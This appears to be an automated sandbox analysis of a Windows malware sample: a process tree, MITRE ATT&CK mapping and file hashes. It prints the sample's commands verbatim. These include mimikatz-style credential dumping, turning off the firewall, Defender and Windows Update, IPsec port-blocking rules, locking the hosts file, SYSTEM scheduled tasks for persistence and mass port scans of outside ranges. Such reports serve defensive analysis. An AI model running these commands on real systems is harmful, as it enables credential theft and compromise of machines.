C:\Windows\clyfknye\iugnatn.exeC:\Windows\clyfknye\iugnatn.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2100
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:2700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2816
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2656
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2900
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2288
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2664
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2616
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bhnrmjzve\ylfnetdkf\wpcap.exe /S2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Windows\bhnrmjzve\ylfnetdkf\wpcap.exeC:\Windows\bhnrmjzve\ylfnetdkf\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
PID:980 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1800
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵PID:1912
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1676
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵PID:1948
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:1744
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2976
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:2408
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2436
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2192 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2244
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2204 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1488 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2044
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bhnrmjzve\ylfnetdkf\nvjihepny.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bhnrmjzve\ylfnetdkf\Scant.txt2⤵
- Loads dropped DLL
PID:2248 -
C:\Windows\bhnrmjzve\ylfnetdkf\nvjihepny.exeC:\Windows\bhnrmjzve\ylfnetdkf\nvjihepny.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bhnrmjzve\ylfnetdkf\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bhnrmjzve\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\bhnrmjzve\Corporate\log.txt2⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:904 -
C:\Windows\bhnrmjzve\Corporate\vfshost.exeC:\Windows\bhnrmjzve\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "snyranbyq" /ru system /tr "cmd /c C:\Windows\ime\iugnatn.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2432 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "snyranbyq" /ru system /tr "cmd /c C:\Windows\ime\iugnatn.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2272
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "urrccynsd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\clyfknye\iugnatn.exe /p everyone:F"2⤵PID:2284
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2500
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "urrccynsd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\clyfknye\iugnatn.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "guazilkrq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\salleihmy\reirjf.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:872 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "guazilkrq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\salleihmy\reirjf.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1216
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2032
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2832
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2632
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2660
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2688
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2548
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2996
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2640
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:352
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:480
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1800
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1676
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
PID:1152 -
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
PID:772 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
PID:2856
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
PID:856 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:2844
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
PID:1148 -
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
PID:2532 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
PID:940
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:2292
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
PID:1788 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
PID:300
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:2192
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
PID:440 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
PID:1736
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:2200 -
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2188
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:920 -
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3060
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:2760 -
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:992 -
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:1852
-
-
-
C:\Windows\TEMP\bhnrmjzve\tlnhsrrfm.exeC:\Windows\TEMP\bhnrmjzve\tlnhsrrfm.exe -accepteula -mp 1016 C:\Windows\TEMP\bhnrmjzve\1016.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:1844
-
-
C:\Windows\TEMP\bhnrmjzve\tlnhsrrfm.exeC:\Windows\TEMP\bhnrmjzve\tlnhsrrfm.exe -accepteula -mp 1104 C:\Windows\TEMP\bhnrmjzve\1104.dmp2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
-
C:\Windows\TEMP\bhnrmjzve\tlnhsrrfm.exeC:\Windows\TEMP\bhnrmjzve\tlnhsrrfm.exe -accepteula -mp 1168 C:\Windows\TEMP\bhnrmjzve\1168.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1272
-
-
C:\Windows\TEMP\bhnrmjzve\tlnhsrrfm.exeC:\Windows\TEMP\bhnrmjzve\tlnhsrrfm.exe -accepteula -mp 1312 C:\Windows\TEMP\bhnrmjzve\1312.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
C:\Windows\TEMP\bhnrmjzve\tlnhsrrfm.exeC:\Windows\TEMP\bhnrmjzve\tlnhsrrfm.exe -accepteula -mp 1604 C:\Windows\TEMP\bhnrmjzve\1604.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
C:\Windows\TEMP\bhnrmjzve\tlnhsrrfm.exeC:\Windows\TEMP\bhnrmjzve\tlnhsrrfm.exe -accepteula -mp 1656 C:\Windows\TEMP\bhnrmjzve\1656.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\TEMP\bhnrmjzve\tlnhsrrfm.exeC:\Windows\TEMP\bhnrmjzve\tlnhsrrfm.exe -accepteula -mp 1956 C:\Windows\TEMP\bhnrmjzve\1956.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1288
-
-
C:\Windows\TEMP\bhnrmjzve\tlnhsrrfm.exeC:\Windows\TEMP\bhnrmjzve\tlnhsrrfm.exe -accepteula -mp 2052 C:\Windows\TEMP\bhnrmjzve\2052.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\bhnrmjzve\ylfnetdkf\scan.bat2⤵
- Loads dropped DLL
PID:440 -
C:\Windows\bhnrmjzve\ylfnetdkf\eenjufmqs.exeeenjufmqs.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
PID:884 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3020
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3728
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:1972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1532
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:3720
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
C:\Windows\SysWOW64\ooeaya.exeC:\Windows\SysWOW64\ooeaya.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2180
-
C:\Windows\system32\taskeng.exetaskeng.exe {F7FC4101-FDCC-4C22-A7F7-DF271FF877B5} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1284
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\iugnatn.exe2⤵PID:3016
-
C:\Windows\ime\iugnatn.exeC:\Windows\ime\iugnatn.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2212
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\clyfknye\iugnatn.exe /p everyone:F2⤵PID:2884
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2088
-
-
C:\Windows\system32\cacls.execacls C:\Windows\clyfknye\iugnatn.exe /p everyone:F3⤵PID:972
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\salleihmy\reirjf.exe /p everyone:F2⤵PID:3024
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1764
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\salleihmy\reirjf.exe /p everyone:F3⤵PID:1756
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\iugnatn.exe2⤵PID:2732
-
C:\Windows\ime\iugnatn.exeC:\Windows\ime\iugnatn.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2696
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\salleihmy\reirjf.exe /p everyone:F2⤵PID:2528
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:544
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\salleihmy\reirjf.exe /p everyone:F3⤵PID:3100
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\clyfknye\iugnatn.exe /p everyone:F2⤵PID:2492
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2672
-
-
C:\Windows\system32\cacls.execacls C:\Windows\clyfknye\iugnatn.exe /p everyone:F3⤵PID:3248
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Subvert Trust Controls
1Install Root Certificate
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.5MB
MD5026e11ca4ac60f54f49b41ffcee29a6d
SHA1ad6e4fbfa7d02cc7890d0e676979775f3e4f3d88
SHA2561118c457bed27ea69eea1c31c7d4b9c7958a7bd932edace24096d8dab37dee48
SHA512a98626b1e23e450520105fc88adc53c36f39669a118194ec20c22974d8add6079dbdac5da0280e5a757044d669eb1a0c382770d155b09806ddd1bfa3cf246cce
-
Filesize
1.3MB
MD5f99baec6a78d9c57a01fe7650b3b3071
SHA137a8df707396f417cb66355c0c9a57ddb4dc4785
SHA256892eb64f1f8399ecf166febda6eae82be5607e8f70dfa9a64781644d4a098b84
SHA512e07db6fc3c6d40930fd4f4f48a2328d36d5faa1ec0fca253e82812543cec6aaf1c05ab3e59a824aa38f5fd32fd9b14c30ad31be505653f71c87d7514420b2637
-
Filesize
1.3MB
MD50f07b448d778b4887212bd7139dd60d0
SHA146f3c9c5fa802aee8de766eb55ff9ef4ca05a77e
SHA256eecb670b1c13a35753427eba2c9bb7ab681ba5b5a26b6c3ec20d33185a034925
SHA5126bffad50334bbb5eb45eaf14f36f7b924184c8b3d08c9c7e3585d68ba925e4ff20b78bcc4ac342b50035e170e27e5aa19c701af699b9968704ac5b2b8a06b3fe
-
Filesize
3.9MB
MD5b10ff28ea419a317114fcfffb16b5955
SHA1a2cda2b82d0d3ab76b4ab432aa1edb7287d34322
SHA25671813bf795cd39e8a8c951669db2009841f732b6bae5ff17f84f122cd9468718
SHA512736ec5be42d1dc648c0162c478042e66bf81c6a97aeb64e49056c20fbc898bd1730ac349c8b36955614c30c0ad27750844a26e067964171ac0c515915dc9bb07
-
Filesize
2.1MB
MD56764c608d1ebae56314838d43e5db585
SHA1c59530ccb3389bd9d6e3c19b6a3e579f27764320
SHA256fe259324e2c4b14444a70842ff7a54093f048f864fa0a00571bb6e5323c82f44
SHA5122b409a6817653289322aa96425f722e76c71c4251d9d7ba94bd707ca75c83ca630c9318f5fba490742b5e80cac46940021db78fc5a7777476fe51f6ed38dfa01
-
Filesize
5.1MB
MD5024b8c6f4b50e217de29aa0f87a6c095
SHA1b46c5a3a2165775572a1d035da3c1d17208c0019
SHA2566e04d69dd509ca6db36dcb384dedcc3537de77747e70fddb93625847df17793d
SHA512fcfcdcab9e874c0f1551f59134c078145f5fa42a4de4426e7d562dca3952b7c11cff5417dad645d56a3f40edfae0a1d254e6922e359aefda38e5b9cae758f31c
-
Filesize
7.1MB
MD571d7df5b5abf744b754da0f967417136
SHA1e110f7379c0444e54429ad9e85a95f344ee7c8ee
SHA2566cbd665086d6084c212f43bd8effed2ac3ee53d265b73e54118ffc71d2726acb
SHA512c19ff1208bcfac43be61ed6d08cbaa752db7fd0190b70c9b6089955731de1ac9bedb47242394dc1859bec22414a537b225f58b50244c82f1fb30c951bec648a5
-
Filesize
851KB
MD55191710f21247ba47fadb0c63fbdd0bb
SHA128a611c0a1c461f6086b45101f0b887377762a1c
SHA256c5f40487a3da4e2cc0f229ec4369d9ce7b05e7becd6c1acef94ee7716ddc4db4
SHA51277c7f5e7ff00cf648c88d18fea76591f1c1a9c7e6a4a367f57f132820156b584d4de44d53eea180f50cfe3466fcd4d3f48d7e38194a44a122f8fc227dadc8005
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
4KB
MD56644bbbb1a1b0b0745b84047f43f63a9
SHA167ba03f1bbcaafc7996a52d46ba36b58f53193b3
SHA25650ec99f39f1c155cedf1187a1bbba4d06281d9a9a5e03d415e0777dc4febcc12
SHA5129817423bcc459b82e0fdcbe732d7bb2ea05d11be02523e7354fee7c94c7a66692ed55b0ff1b749c55b86fcc8857787a7afe605cace9ae6682722ea947609147e
-
Filesize
162B
MD51d9a476d18899dc856c8b9d7cdac9fd0
SHA16ece259524c9d5567ac27a661d5cd1cb9b015063
SHA256b6f36133df2286761760e8d32ae2f9b4a9a224229d8a72c18e18f9d8943611c4
SHA5123cc61057d9e16d0987bdf15733eded6a92150cd9fa0604c71c4503597107e506414a08b2950dc541872a4d475da798e1e8ef399ae6d55e378acfbcb61b1967e3
-
Filesize
160B
MD5ac63e0fe405104c62d23371ee0e1bed0
SHA151060c8b4b4091b033d5328a4f3d29c36ab1a2e9
SHA256a0fe74cdb0dcb8d17ec29b33332f024e5a06c0485f02ec099b8054444b08d54e
SHA5124db4a634dc7003cb1383feb55d255d469c4b74d261ed65a1e501f4e3a54d56b7da40fff167ab7f2530a2436c625d029c61f7d1cfe531844b41d1cdb6a9646a2b
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
975B
MD5b5d815ff5310f62de5020591be598bc0
SHA18013562b0cc2516d16d474308c8982a31b7f5dd0
SHA256a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85
SHA5124e3175ef0c289e1beea60f51239a98533690505b709f778703502dad3f72e3c7e9aa26e1a3837712ed5e1344e28e5ccff1d63a1245352bbc8435a71e15347a94
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
